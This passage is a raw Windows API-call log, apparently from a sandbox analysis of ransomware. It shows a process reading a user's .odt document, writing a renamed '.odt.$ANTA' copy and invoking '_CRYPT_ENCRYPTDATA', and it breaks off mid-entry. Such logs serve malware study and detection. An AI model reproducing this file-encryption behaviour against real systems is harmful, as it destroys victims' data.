RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.331] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.331] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0079.331] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\hr3cojo6wftwpyw3h.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.332] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.332] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.333] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0079.333] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0079.335] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0079.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4d88 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4d88 | out: hHeap=0x1780000) returned 1 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0079.337] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\hr3cojo6wftwpyw3h.odt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.338] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.339] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.339] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.339] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0079.344] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.344] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0xa840, lpOverlapped=0x0) returned 1 [0079.345] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa840) returned 0x499a008 [0079.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa840) returned 0x49a4850 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.348] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa840) returned 0x499a008 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.349] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.349] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.349] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa840) returned 0x499a008 [0079.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0079.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa840) returned 0x49af098 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.351] PeekMessageW (in: 